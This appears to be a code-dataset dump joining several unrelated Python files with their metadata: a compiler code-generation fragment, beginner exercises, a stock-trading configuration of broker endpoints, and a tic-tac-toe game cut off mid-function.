        write("endIf", ifNumber, "\n")
    else:
        # A false condition falls through to the next clause's label.
        innerIf = (IF_NUMBER + 1)
        y = str(innerIf)
        write("if", y , "\n")
    genBlock(tree[5])
    #JUMP TO ENDIF 1
    write("\n\tjmp endIf", ifNumber)
    #Else and else_if
    if(tree[6] != "ENDIF"):
        genIf2(tree[6:], ifNumber)
    #ENDIF
    write("\nendIf", ifNumber,":\n" )
##########Auxiliary functions#############
# Auxiliary functions using the global variables, mainly for type checking
# and handling lists
# Gets current scope on stack.
def getAllStack():
    """Concatenate every scope prefix currently on the global stack
    into a single string (inner-most scope last)."""
    return "".join(stack)
# Gets the inner most scope a variable is being found in + the variable
# or an empty string if the variable is not in any scope, e.g. global variables
def getScopePlusVar(tree):
    """Return the inner-most scoped name under which *tree*'s variable
    is allocated (e.g. "__f__scope_x"), or "" when no scope (including
    the global one) holds it.

    The candidate names are built by popping the global scope stack one
    prefix at a time; the stack is restored from the `aux` copy before
    the lookup, so the function has no lasting side effect.
    """
    global stack
    global allocationTable
    potentialVarNames = []
    aux = list(stack)
    # A negative/unary node carries the variable in tree[1].
    if (type(tree) is list and len(tree) > 1):
        var = tree[1]
    elif (type(tree) is list):
        var = tree[0]
    else:
        var = tree
    # Enumerate candidates from inner-most to outer-most scope.
    while (len(stack) > 0):
        potentialVarNames.append(getAllStack()+var)
        stack.pop()
    potentialVarNames.append(var)
    stack = list(aux)
    # Finds if varname is in any scope of the allocation table
    for p in potentialVarNames:
        if (p in allocationTable):
            return p
    return ""
# Gets register associated with a variable in the inner most scope found
def getRegisterInScope(tree):
    """Return the storage operand (register name or memory reference)
    recorded for the inner-most scoped match of *tree* in the
    allocation table, or "" when the variable is not allocated."""
    global allocationTable
    # Resolve the scoped name once: getScopePlusVar walks (and
    # restores) the global scope stack, so the previous double call
    # did that walk twice per lookup.
    scopedName = getScopePlusVar(tree)
    if (scopedName != ""):
        return allocationTable[scopedName][0]
    return ""
# Cleans extra brackets from lists with one element.
def cleanList(tree):
    """Collapse redundant single-element list nesting from the parser:
    a [[x]] wrapper is unwrapped to the cleaned x, longer lists are
    cleaned element by element (in place), and non-list values pass
    through unchanged."""
    single_wrapped = len(tree) == 1 and type(tree[0]) is list
    if single_wrapped:
        return cleanList(tree[0])
    if type(tree) is list and len(tree) > 1:
        for idx, item in enumerate(tree):
            tree[idx] = cleanList(item)
    return tree
# Verifies if a tree contains an expression, function call, negation, etc
# or a simple value int/char value like 42 or 'a'
def isValue(tree):
    """Return True when *tree* is (possibly nested wrapping of) a
    simple literal -- an integer like 42, a char like 'a', or a
    string like "hi" -- and False for expressions, calls, negations
    and other multi-element nodes."""
    node = tree
    # Peel single-element wrappers; a multi-element list is not a value.
    while type(node) is list and len(node) == 1:
        node = node[0]
    if type(node) is list:
        return False
    return isInteger(node) or isChar(node) or isString(node)
def isChar(tree):
    """Return True when *tree* is a single-quoted char literal token
    such as 'a'.

    The length guard makes the empty string return False instead of
    raising IndexError, and stops a lone quote character from being
    misread as a char literal.
    """
    return len(tree) >= 2 and tree[0] == "\'" and tree[len(tree)-1] == "\'"
def isString(tree):
    """Return True when *tree* is a double-quoted string literal token
    such as "hello".

    The length guard makes the empty string return False instead of
    raising IndexError, and stops a lone double quote from being
    misread as a string literal.
    """
    return len(tree) >= 2 and tree[0] == "\"" and tree[len(tree)-1] == "\""
def isInteger(tree):
    """Return True when *tree* consists entirely of decimal digits.

    An empty token is no longer accepted: the old per-character loop
    returned True vacuously for "".  Signed numbers ("-5") are still
    rejected, matching the original behaviour.
    """
    return len(tree) > 0 and all(digit.isdigit() for digit in tree)
def cleanToFirstValue(tree):
    """Descend into the first element of arbitrarily nested lists and
    return the first non-list value found."""
    if type(tree) is list:
        return cleanToFirstValue(tree[0])
    return tree
| 28.897143 | 79 | 0.57109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,830 | 0.238778 |
aa03628128470066c6fb4c6581837b4e0400afec | 990 | py | Python | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | desafios/desafio059.py | carlosdaniel-cyber/my-python-exercises | 0d6b2874448e0bc1f8c4a5948b0beae56b95ba6b | [
"MIT"
] | null | null | null | from time import sleep
# Read the two operands the menu options will work on.
n1 = int(input('Primeiro valor: '))
n2 = int(input('Segundo valor: '))
op = 0
# Menu loop: repeats until option 5 (exit) is chosen.
while op != 5:
    print(''' [ 1 ] somar
    [ 2 ] multiplicar
    [ 3 ] maior
    [ 4 ] novos números
    [ 5 ] sair do programa''')
    op = int(input('>>>>> Qual é a sua opção? '))
    if op == 1:
        # Option 1: sum of the current numbers.
        s = n1 + n2
        print('A soma entre {} + {} é {}'.format(n1, n2, s))
    elif op == 2:
        # Option 2: product of the current numbers.
        m = n1 * n2
        print('O resultado de {} x {} é {}'.format(n1, n2, m))
    elif op == 3:
        # Option 3: report the larger of the two.
        if n1 > n2:
            maior = n1
        else:
            maior = n2
        print('Entre {} e {} o maior valor é {}'.format(n1, n2, maior))
    elif op == 4:
        # Option 4: replace both operands.
        print('Informe os números novamente: ')
        n1 = int(input('Primeiro valor: '))
        n2 = int(input('Segundo valor: '))
    elif op == 5:
        print('Finalizando...')
    else:
        print('Opção inválida. Tente novamente')
    print('=-'*20)
    sleep(1)
print('Fim do programa! Volte sempre!')
| 28.285714 | 71 | 0.491919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 426 | 0.425574 |
aa04307124ba223bc978e954f54e343c9efb1a6f | 569 | py | Python | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | curso em video/python/mundo 1/ex033.py | KenzoDezotti/cursoemvideo | 6eba03e67192f7384092192ed2cc1a8e59efd9b9 | [
"MIT"
] | null | null | null | c = int(input('digite o primeiro numero: '))
b = int(input('digite o segundo numero: '))
a = int(input('digite o terceiro numero: '))
# ANSI escape codes used to colour the results ('zero' resets).
cores = {'vermelho': '\033[0;31m',
         'azul': '\033[1;34m',
         'zero': '\033[m'}
# Largest of the three.  BUGFIX: the original pairwise comparisons
# mishandled ties (e.g. b == c > a reported `a` as the largest);
# the built-in max/min handle every case, including duplicates.
maior = max(a, b, c)
print('O maior valor foi {}{}{}'.format(cores['azul'], maior, cores['zero']))
# Smallest of the three.
menor = min(a, b, c)
print('O menor valor foi {}{}{}'.format(cores['vermelho'], menor, cores['zero']))
| 25.863636 | 79 | 0.56239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 245 | 0.43058 |
aa045e92b1da01e687147246d74bf80b0eabb154 | 1,547 | py | Python | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | pythonCore/ch03/E12.py | Furzoom/learnpython | a3034584e481d4e7c55912d9da06439688aa67ea | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def read_text_file():
    """Prompt for a filename and print its contents line by line.

    Open errors are reported rather than raised (Python 2 `except
    Exc, e` syntax).
    """
    # get filename
    fname = raw_input('Enter filename: ')
    print
    # attempt to open file for reading
    try:
        fobj = open(fname, 'r')
    except IOError, e:
        print '*** file open error:', e
    else:
        # display contents to the screen
        for eachline in fobj:
            # trailing comma: the line already ends with '\n'
            print eachline,
        fobj.close()
def write_text_file():
    """Prompt for a new filename, collect lines until a lone '.', and
    write them out with the platform line separator appended."""
    import os
    ls = os.linesep
    fname = ''
    # get filename; refuse to overwrite an existing file
    while True:
        fname = raw_input('Input filename: ')
        if os.path.exists(fname):
            print "ERROR: '%s' already exists" % fname
        else:
            break
    # get file content (text) lines
    all_content = []
    print "\nEnter lines ('.' by itself quit).\n"
    # loop until user terminates input
    while True:
        entry = raw_input('> ')
        if entry == '.':
            break
        else:
            all_content.append(entry)
    # write lines to file with proper line-ending
    fobj = open(fname, 'w')
    fobj.writelines(['%s%s' % (x, ls) for x in all_content])
    fobj.close()
    print 'DONE!'
if '__main__' == __name__:
    # Simple text menu: write a file, read a file, or exit on 'x'/'X'.
    item = ''
    while True:
        print '(1) Write to file'
        print '(2) Read from file'
        print '(x) Exit'
        item = raw_input('> ')
        if item == '1':
            write_text_file()
        elif item == '2':
            read_text_file()
        elif item == 'x' or item == 'X':
            break
        else:
            # Any other input just redisplays the menu.
            continue
| 22.1 | 60 | 0.517776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 479 | 0.309632 |
aa057ded2140561374c7da858671054b70b4655e | 12,212 | py | Python | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | 1 | 2020-06-22T06:18:07.000Z | 2020-06-22T06:18:07.000Z | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | null | null | null | configs/__init__.py | fswzb/autotrade | e3240dc6d5d81504b3df3be7f0f85000ce5b634d | [
"MIT"
] | 1 | 2019-11-24T18:09:47.000Z | 2019-11-24T18:09:47.000Z | # coding=utf-8
# MySQL connection parameters for the autotrade database.
# NOTE(review): the empty `passwd` is presumably filled in per
# deployment -- do not commit real credentials here.
common_mysql_config = {
    'user': 'root',
    'passwd': '',
    'host': '127.0.0.1',
    'db': 'autotrade',
    'connect_timeout': 3600,
    'charset': 'utf8'
}
# Per-broker credential templates.  The Chinese values are placeholder
# descriptions (account number, encrypted password, etc.) meant to be
# replaced with real credentials before use.
yongjinbao_config = {"account": "帐号", "password": "加密后的密码"}
guangfa_config = {"username": "加密的客户号", "password": "加密的密码"}
yinghe_config = {"inputaccount": "客户号", "trdpwd": "加密后的密码"}
huatai_config = {"userName": "用户名", "servicePwd": "通讯密码", "trdpwd": "加密后的密码"}
# Xueqiu additionally needs the portfolio to trade and its market.
xueqiu_config = {
    "username": "邮箱",
    "account": "手机号",
    "password": "加密后的密码",
    "portfolio_code": "组合代码(例:ZH818559)",
    "portfolio_market": "交易市场(例:us 或者 cn 或者 hk)"
}
# Response post-processing shared by all brokers: field names (both
# English keys and Chinese column headers) whose values should be
# coerced to int or float when parsing trade responses.
global_config = {
    "response_format": {
        "int": [
            "current_amount", "enable_amount", "entrust_amount", "成交数量",
            "撤单数量", "委托数量", "股份可用", "买入冻结", "买出冻结", "当前持仓", "股份余额"
        ],
        "float": [
            "current_balance", "enable_balance", "fetch_balance",
            "market_value", "asset_balance", "av_buy_price", "cost_price",
            "income_balance", "market_value", "entrust_price",
            "business_amount", "business_price", "business_balance", "fare1",
            "occur_balance", "farex", "fare0", "occur_amount", "post_balance",
            "fare2", "fare3", "资金余额", "可用资金", "参考市值", "总资产", "股份参考盈亏", "委托价格",
            "参考盈亏", "参考市价", "参考市值"
        ]
    }
}
yjb_config = {
"login_page": "https://jy.yongjinbao.com.cn/winner_gj/gjzq/",
"login_api": "https://jy.yongjinbao.com.cn/winner_gj/gjzq/exchange.action",
"verify_code_api":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/user/extraCode.jsp",
"prefix":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/stock/exchange.action",
"logout_api":
"https://jy.yongjinbao.com.cn/winner_gj/gjzq/stock/exchange.action?function_id=20&login_type=stock",
"login": {
"function_id": 200,
"login_type": "stock",
"version": 200,
"identity_type": "",
"remember_me": "",
"input_content": 1,
"content_type": 0,
"loginPasswordType": "B64",
"disk_serial_id": "ST3250820AS",
"cpuid": "-41315-FA76141D",
"machinecode": "-41315-FA76141D"
},
"buy": {
"service_type": "stock",
"request_id": "buystock_302"
},
"sell": {
"service_type": "stock",
"request_id": "sellstock_302"
},
"position": {
"request_id": "mystock_403"
},
"balance": {
"request_id": "mystock_405"
},
"entrust": {
"request_id": "trust_401",
"sort_direction": 1,
"deliver_type": "",
"service_type": "stock"
},
"cancel_entrust": {
"request_id": "chedan_304"
},
"current_deal": {
"request_id": "bargain_402",
"sort_direction": 1,
"service_type": "stock"
},
"ipo_enable_amount": {
"request_id": "buystock_300"
},
"exchangetype4stock": {
"service_type": "stock",
"function_id": "105"
},
"account4stock": {
"service_type": "stock",
"function_id": "407",
"window_id": "StockMarketTrade"
}
}
yh_config = {
"login_page": "https://www.chinastock.com.cn/trade/webtrade/login.jsp",
"login_api":
"https://www.chinastock.com.cn/trade/LoginServlet?ajaxFlag=mainlogin",
"heart_beat":
"https://www.chinastock.com.cn/trade/AjaxServlet?ajaxFlag=heartbeat",
"unlock":
"https://www.chinastock.com.cn/trade/AjaxServlet?ajaxFlag=unlockscreen",
"trade_api": "https://www.chinastock.com.cn/trade/AjaxServlet",
"trade_info_page":
"https://www.chinastock.com.cn/trade/webtrade/tradeindex.jsp",
"verify_code_api":
"https://www.chinastock.com.cn/trade/webtrade/verifyCodeImage.jsp",
"prefix": "https://www.chinastock.com.cn",
"logout_api":
"https://www.chinastock.com.cn/trade/webtrade/commons/keepalive.jsp?type=go",
"login": {
"logintype_rzrq": 0,
"orgid": "",
"inputtype": "C",
"identifytype": 0,
"isonlytrade": 1,
"trdpwdjtws": "",
"Authplain9320": "",
"Authsign9321": "",
"certdata9322": "",
"ftype": "bsn"
},
"position": {
"service_jsp": "/trade/webtrade/stock/stock_zjgf_query.jsp",
"service_type": 1
},
"balance": {
"service_jsp": "/trade/webtrade/stock/stock_zjgf_query.jsp",
"service_type": 2
},
"entrust": {
"service_jsp": "/trade/webtrade/stock/stock_wt_query.jsp"
},
"buy": {
"marktype": "",
"ajaxFlag": "wt"
},
"sell": {
"ajaxFlag": "wt"
},
"fundpurchase": {
"ajaxFlag": "wt",
"bsflag": 3
},
"fundredemption": {
"ajaxFlag": "wt",
"bsflag": 4
},
"fundsubscribe": {
"ajaxFlag": "wt",
"bsflag": 5
},
"fundsplit": {
"ajaxFlag": "wt",
"bsflag": 85
},
"fundmerge": {
"ajaxFlag": "wt",
"bsflag": 86
},
"cancel_entrust": {
"ajaxFlag": "stock_cancel"
},
"current_deal": {
"service_jsp": "/trade/webtrade/stock/stock_cj_query.jsp"
},
"account4stock": {
"service_jsp": "/trade/webtrade/zhgl/holderQuery.jsp"
}
}
# Xueqiu (雪球) web endpoints: login, portfolio pages, stock search,
# rebalancing creation/history, and the referer template used when
# posting holdings updates (%s is the portfolio symbol).
xq_config = {
    "login_api": "https://xueqiu.com/user/login",
    "prefix": "https://xueqiu.com/user/login",
    "portfolio_url": "https://xueqiu.com/p/",
    "search_stock_url": "https://xueqiu.com/stock/p/search.json",
    "rebalance_url": "https://xueqiu.com/cubes/rebalancing/create.json",
    "history_url": "https://xueqiu.com/cubes/rebalancing/history.json",
    "referer": "https://xueqiu.com/p/update?action=holdings&symbol=%s"
}
ht_config = {
"login_page": "https://service.htsc.com.cn/service/login.jsp",
"login_api":
"https://service.htsc.com.cn/service/loginAction.do?method=login",
"trade_info_page":
"https://service.htsc.com.cn/service/flashbusiness_new3.jsp?etfCode=",
"verify_code_api":
"https://service.htsc.com.cn/service/pic/verifyCodeImage.jsp",
"prefix": "https://tradegw.htsc.com.cn",
"logout_api": "https://service.htsc.com.cn/service/login.jsp?logout=yes",
"login": {
"loginEvent": 1,
"topath": "null",
"accountType": 1,
"userType": "jy",
"hddInfo": "ST3250820AS"
},
"position": {
"cssweb_type": "GET_STOCK_POSITION",
"function_id": 403,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"query_mode": 0,
"request_num": 100,
"position_str": ""
},
"balance": {
"cssweb_type": "GET_FUNDS",
"function_id": 405,
"identity_type": "",
"money_type": ""
},
"entrust": {
"cssweb_type": "GET_CANCEL_LIST",
"function_id": 401,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"position_str": ""
},
"buy": {
"cssweb_type": "STOCK_BUY",
"function_id": 302,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"identity_type": "",
"entrust_bs": 1
},
"sell": {
"cssweb_type": "STOCK_SALE",
"function_id": 302,
"exchange_type": "",
"stock_account": "",
"stock_code": "",
"query_direction": "",
"sort_direction": 0,
"request_num": 100,
"identity_type": "",
"entrust_bs": 2
},
"cancel_entrust": {
"cssweb_type": "STOCK_CANCEL",
"function_id": 304,
"exchange_type": "",
"stock_code": "",
"identity_type": "",
"entrust_bs": 2,
"batch_flag": 0
},
"exchangebill": {
"cssweb_type": "GET_EXCHANGEBILL",
"request_num": 100,
"end_date": "",
"start_date": "",
"exchange_type": "",
"stock_code": "",
"deliver_type": 1,
"query_direction": "",
"function_id": 308,
"stock_account": "",
"position_str": ""
}
}
gf_config = {
"login_api": "https://trade.gf.com.cn/login",
"login_page": "https://trade.gf.com.cn/",
"verify_code_api": "https://trade.gf.com.cn/yzm.jpgx",
"prefix": "https://trade.gf.com.cn/entry",
"logout_api": "https://trade.gf.com.cn/entry",
"login": {
"authtype": 2,
"disknum": "1SVEYNFA915146",
"loginType": 2,
"origin": "web"
},
"balance": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryAssert"
},
"position": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryCC",
"request_num": 500,
"start": 0,
"limit": 10
},
"entrust": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryDRWT",
"action_in": 1,
"request_num": 100,
"query_direction": 0,
"start": 0,
"limit": 10
},
"cancel_entrust": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "cancel",
"exchange_type": 1,
"batch_flag": 0
},
"accountinfo": {
"classname": "com.gf.etrade.control.FrameWorkControl",
"method": "getMainJS"
},
"buy": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "entrust",
"entrust_bs": 1
},
"sell": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "entrust",
"entrust_bs": 2
},
"cnjj_apply": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "CNJJSS",
"entrust_bs": 1
},
"cnjj_redeem": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "CNJJSS",
"entrust_bs": 2
},
"fundsubscribe": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": 1
},
"fundpurchase": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": 1
},
"fundredemption": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "doDZJYEntrust",
"entrust_bs": 2
},
"fundmerge": {
"classname": "com.gf.etrade.control.SHLOFFundControl",
"method": "assetSecuprtTrade",
"entrust_bs": ""
},
"fundsplit": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "doDZJYEntrust",
"entrust_bs": ""
},
"nxbQueryPrice": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryPrice"
},
"nxbentrust": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbentrust"
},
"nxbQueryDeliver": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryDeliver"
},
"nxbQueryHisDeliver": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryHisDeliver"
},
"nxbQueryEntrust": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbQueryEntrust"
},
"queryOfStkCodes": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "queryOfStkCodes"
},
"queryNXBOfStock": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "queryNXBOfStock"
},
"nxbentrustcancel": {
"classname": "com.gf.etrade.control.NXBUF2Control",
"method": "nxbentrustcancel"
},
"exchangebill": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "queryDeliver",
"request_num": 50,
"query_direction": 0,
"start_date": "",
"end_date": "",
"deliver_type": 1
},
"queryStockInfo": {
"classname": "com.gf.etrade.control.StockUF2Control",
"method": "getStockHQ"
}
}
| 28.869976 | 104 | 0.546921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8,231 | 0.65943 |
aa05a5f5d054582877f87be6fff364e1313a693c | 8,894 | py | Python | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | 1 | 2016-09-08T02:32:00.000Z | 2016-09-08T02:32:00.000Z | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | pytictactoe.py | ruel/PyTicTacToe | e0b69de085b2b1e9ff5c13a7aeb1382406e4d859 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
'''
PyTicTacToe - Tic Tac Toe in Python
http://ruel.me
Copyright (c) 2010, Ruel Pagayon - ruel@ruel.me
All rights reserved.
Redistribution and use in source and binary forms, with or without
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of ruel.me nor the names of its contributors
may be used to endorse or promote products derived from this
script without specific prior written permission.
THIS SCRIPT IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL RUEL PAGAYON BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SCRIPT, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
General Description: The CPU difficulty is Human-Like. Means, you can still WIN!
I made it so, because I do not want this to be boring, and
end up with loses and draws.
'''
import os, random, time, operator
'''
Classes
'''
class Player:
  '''
  One participant's state: display name, mark ('X' or 'O'), number of
  moves made, and whether the player goes first / has won.
  '''
  def __init__(self, name, weapon):
    self.name, self.weapon = name, weapon
    # A fresh player has made no moves, is not first, and has not won.
    self.moves = 0
    self.won = False
    self.first = False
class BoardCell:
  '''
  One square of the 3x3 grid: its number (1-9), the character shown in
  it, and whether it is still free.
  '''
  def __init__(self, number):
    self.number = number
    self.content = ' '   # blank until a weapon is drawn
    self.empty = True    # flipped to False once taken
def main():
  '''
  Main program flow: toss a coin for first move, play a game, report
  the winner and the running record, then offer a rematch.
  '''
  recorduser, recordcpu, recorddraw = 0, 0, 0
  while True:
    # Toss the coin!  Winner of the toss plays 'X' and goes first.
    won = cointoss()
    if won:
      user = Player('User', 'X')
      cpu = Player('CPU', 'O')
      user.first = True
    else:
      user = Player('User', 'O')
      cpu = Player('CPU', 'X')
      cpu.first = True
    print user.name if user.first else cpu.name, 'goes first.'
    # Give the player 3 seconds before the screen is cleared.
    print 'Clearing screen in 3 seconds (Get Ready!)'
    time.sleep(3)
    # Let the game begin
    tgame(user, cpu)
    # Show the winner (a throwaway Player represents a draw).
    if user.won:
      recorduser += 1
      winner = user
    elif cpu.won:
      recordcpu += 1
      winner = cpu
    else:
      recorddraw += 1
      winner = Player('DRAW', '-')
    print '\nWINNER:', winner.name, '(' + winner.weapon + ')'
    print 'Moves:', winner.moves
    # Record
    print '\nRecord:\tUser:', recorduser, '\n\tCPU:', recordcpu, '\n\tDRAW:', recorddraw
    # Play Again?  Re-prompt until a valid Y/N answer is given.
    while True:
      choice = raw_input('\nPlay again? [Y]es or [N]o: ')
      if choice == 'Y' or choice == 'N':
        break
    # If yes, clear the screen, else break the loop
    if choice == 'Y':
      cls()
    else:
      break
  # Print empty space
  print
'''
Sub function section
'''
def cointoss():
  '''
  Coin-toss sub function: prompt for H or T, flip a virtual coin, and
  return True when the user called it correctly.
  '''
  won = False
  while True:
    choice = raw_input('Heads or Tails (H or T): ')
    # Only accept 'H' or 'T'; anything else re-prompts.
    if choice == 'H' or choice == 'T':
      print 'Tossing Coin..'
      coin = ['Heads', 'Tails'][random.randrange(0, 2)]
      print '\n -- ', coin , ' -- \n'
      # Compare first letter of the result with the user's pick.
      if coin[0] == choice:
        won = True
      break
  return won
def cls():
  '''
  Clear the terminal: 'cls' on Windows, 'clear' everywhere else.
  '''
  command = 'cls' if os.name == 'nt' else 'clear'
  os.system(command)
def drawboard(board):
  '''
  Clear the screen and draw the 3x3 grid with each cell's current
  content, separated by ASCII pipe/dash rules.
  '''
  cls()
  boardstr = ''
  print boardstr + '\n'
  i = 0
  for row in board:
    boardstr += '\t'
    # Top padding row, only before the first line of cells.
    if i == 0:
      boardstr += '      |       |      \n\t'
    boardstr += '  {0}   |   {1}   |  {2}\n'.format(*[cell.content for cell in row])
    # Horizontal rule between rows; plain padding after the last row.
    if i != 2:
      boardstr += '\t      |       |      \n\t------|-------|------\n\t      |       |      \n'
    else:
      boardstr += '\t      |       |      \n'
    i += 1
  print boardstr
def boardinit():
  '''
  Build the 3x3 grid of BoardCell objects, numbered 1..9 row by row.
  '''
  grid = []
  for row in range(3):
    grid.append([BoardCell(row * 3 + col + 1) for col in range(3)])
  return grid
def bdraw(number, board, player):
  '''
  Place the player's weapon ('X' or 'O') on the cell whose number
  matches.  Returns True when the mark was placed, False when the
  cell is already taken or no cell carries that number.
  '''
  for row in board:
    for cell in row:
      if cell.number == number and cell.empty:
        cell.content = player.weapon
        cell.empty = False
        return True
  return False
def usermove(user, board):
    '''
    User's turn: prompt until a number in [1, 9] naming an empty cell is
    entered, then place the user's weapon there.
    (Python 2 raw_input/print syntax.)
    '''
    user.moves += 1
    while True:
        number = 0
        try:
            number = int(raw_input('Your turn [1-9]: '))
        except:
            # non-integer input: report, then fall through and re-prompt
            print 'Invalid input'
        if number >= 1 and number <= 9:
            # bdraw returns False when the chosen cell is occupied
            if bdraw(number, board, user):
                break
def cpumove(cpu, user, board):
    '''
    CPU's turn: complete one of its own lines if possible, otherwise block
    the user's imminent line, otherwise place on random empty cells until
    a draw succeeds.
    '''
    cpu.moves += 1
    # cell completing a CPU line, if any (-2 means none found)
    target = getwnumber(board, cpu.weapon)
    if target == -2:
        # no winning move: look for a cell blocking the user instead
        target = getwnumber(board, user.weapon)
    placed = bdraw(target, board, cpu) if target > 0 else False
    while not placed:
        # keep drawing random cells until an empty one is hit
        placed = bdraw(random.randrange(1, 10), board, cpu)
def getboard(board, weapon):
    '''
    Collect cell numbers from the board, in row-major order.
    weapon == 'T' -> numbers of every occupied ("taken") cell;
    otherwise     -> numbers of the cells holding that weapon.
    '''
    if weapon == 'T':
        return [cell.number
            for row in board for cell in row if not cell.empty]
    return [cell.number
        for row in board for cell in row
        if not cell.empty and cell.content == weapon]
def getwnumber(board, weapon):
    '''
    Find a cell that completes (or, for the opponent's weapon, blocks)
    a line for `weapon`.
    Scans the 8 winning lines in the same order as the original
    hand-written elif chain; for the first line holding two `weapon`
    cells and an unoccupied third cell, return that third cell's number.
    Returns
    -------
    int
        The free cell number, or -2 when no such cell exists.
    '''
    t = getboard(board, weapon)     # cells held by `weapon`
    ex = getboard(board, 'T')       # all occupied cells
    # the 8 winning lines, in the original evaluation order:
    # three rows, both diagonals, then three columns
    lines = ((1, 2, 3), (4, 5, 6), (7, 8, 9),
             (1, 5, 9), (3, 5, 7),
             (1, 4, 7), (2, 5, 8), (3, 6, 9))
    for a, b, c in lines:
        # for each line, test the three "two held + one free" patterns in
        # the original order: missing last, missing first, missing middle
        for held1, held2, free in ((a, b, c), (b, c, a), (a, c, b)):
            if held1 in t and held2 in t and free not in ex:
                return free
    return -2
def isin(val, values):
    '''
    Return True if `val` occurs in the container `values`.
    Thin wrapper around the `in` operator; the parameter was renamed from
    `list` to stop shadowing the builtin (all callers in this file pass it
    positionally).
    '''
    return val in values
def checknumber(xo):
    '''
    Return True if the cell numbers in `xo` contain at least one complete
    winning line (row, column or diagonal) of the 3x3 grid.
    '''
    # the 8 winning lines: three rows, both diagonals, three columns
    lines = ((1, 2, 3), (4, 5, 6), (7, 8, 9),
             (1, 5, 9), (3, 5, 7),
             (1, 4, 7), (2, 5, 8), (3, 6, 9))
    cells = set(xo)
    return any(cells.issuperset(line) for line in lines)
def checkwin(board, weapon):
    '''
    Return True if `weapon` already owns a complete winning line
    on the board.
    '''
    return checknumber(getboard(board, weapon))
def checktie(board):
    '''
    Return True when all 9 cells are occupied, i.e. the round is a draw.
    '''
    return len(getboard(board, 'T')) == 9
def tgame(user, cpu):
    '''
    Main Game function: run one full round of tic-tac-toe between `user`
    and `cpu`, alternating turns until a win or a draw. Sets the winner's
    .won flag.
    '''
    board = boardinit()
    drawboard(board)

    def _finished(player):
        # redraw, then report whether this player's move ended the round
        drawboard(board)
        if checkwin(board, player.weapon):
            player.won = True
            return True
        return checktie(board)

    if cpu.first:
        # CPU opens; no win/tie check is needed after the opening move
